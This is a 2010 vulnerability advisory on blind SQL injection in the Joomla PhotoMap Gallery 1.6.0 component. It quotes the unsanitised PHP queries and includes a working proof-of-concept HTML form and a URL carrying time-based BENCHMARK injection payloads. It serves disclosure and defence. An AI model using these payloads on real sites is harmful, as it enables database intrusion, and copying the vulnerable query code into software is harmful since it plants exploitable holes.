Joomla! Component com_photomapgallery 1.6.0 - Multiple Blind SQL Injections

PhotoMap Gallery 1.6.0 Joomla Component Multiple Blind SQL Injection

 Name              PhotoMap Gallery
 Vendor            http://extensions.joomla.org/extensions/photos-a-images/photo-gallery/10658
 Versions Affected 1.6.0

 Author            Salvatore Fresta aka Drosophila
 Website           http://www.salvatorefresta.net
 Contact           salvatorefresta [at] gmail [dot] com
 Date              2010-07-28

X. INDEX

 I.    ABOUT THE APPLICATION
 II.   DESCRIPTION
 III.  ANALYSIS
 IV.   SAMPLE CODE
 V.    FIX
 

I. ABOUT THE APPLICATION
________________________

PhotoMap Gallery  is  a   gallery  component  completely
integrated  into  Joomla 1.5.x. Like 'Picasa', 'Flickr',
or 'Panoramio',  you  can  easily  add geo-tags  to your
photos  so  that  you can remember exactly where they're
from using Google Maps.


II. DESCRIPTION
_______________

Some parameters  are not properly sanitised before being
used in SQL queries.


III. ANALYSIS
_____________

Summary: 

A) Multiple Blind SQL Injection
_______________________________

The parameter id passed to controller.php  via POST when
view is set to user and task is set to save_usercategory
is  not  properly sanitised  before being  used in a SQL
query. This  can  be exploited to manipulate SQL queries
by injecting arbitrary SQL code.

The parameter folder passed to  imagehandler.php  is not
properly sanitised before used in a SQL query.  This can
be  exploited  to  manipulate  SQL  queries by injecting
arbitrary SQL code.

The following is the affected code.

controller.php (line 1135):

function save_usercategory() {

    // Check for request forgeries
	JRequest::checkToken() or jexit( 'Invalid Token' );
		
	$user			= & JFactory::getUser();
	$task			= JRequest::getVar('task');
	$post 			= JRequest::get('post');

	//perform access checks
	$isNew = ($post['id']) ? false : true;

//	$catid = (int) JRequest::getVar('catid', 0);
		
	$db 	=& JFactory::getDBO();
	$query = 'SELECT c.id, c.directory'
				. ' FROM #__g_categories AS c'
				. ' WHERE c.id = '.$post['id'];


imagehandler.php (line 109);

function getList() {

	static $list;

	// Only process the list once per request
	if (is_array($list)) {
		return $list;
	}

	// Get folder from request
	$folder = $this->getState('folder');
	$search = $this->getState('search');

	$query = 'SELECT *'
			. ' FROM #__g_categories'
			. ' WHERE id = '.$folder;



IV. SAMPLE CODE
_______________

A) Multiple Blind SQL Injection

Replace 89eb36eca1919aff534b13b54796c9a4 with your own.

<html>
	<head>
	    <title>PoC - PhotoMap Gallery 1.6.0 Blind SQL Injection</title>
	</head>
	<body>
	    <form method="POST" action="http://127.0.0.1/joomla/index.php">
	        <input type="hidden" name="89eb36eca1919aff534b13b54796c9a4" value="1">
			<input type="hidden" name="option" value="com_photomapgallery">
			<input type="hidden" name="controller" value="">
			<input type="hidden" name="view" value="user">
		    <input type="hidden" name="task" value="save_usercategory">
		    <input type="hidden" name="id" value="-1 AND (SELECT(IF(0x41=0x41, BENCHMARK(99999999999,NULL),NULL)))">
		    <input type="submit">
	    </form>
	</body>
</html>


http://site/path/index.php?option=com_photomapgallery&view=imagehandler&folder=-1 OR (SELECT(IF(0x41=0x41,BENCHMARK(9999999999,NULL),NULL)))


V. FIX
______

No fix.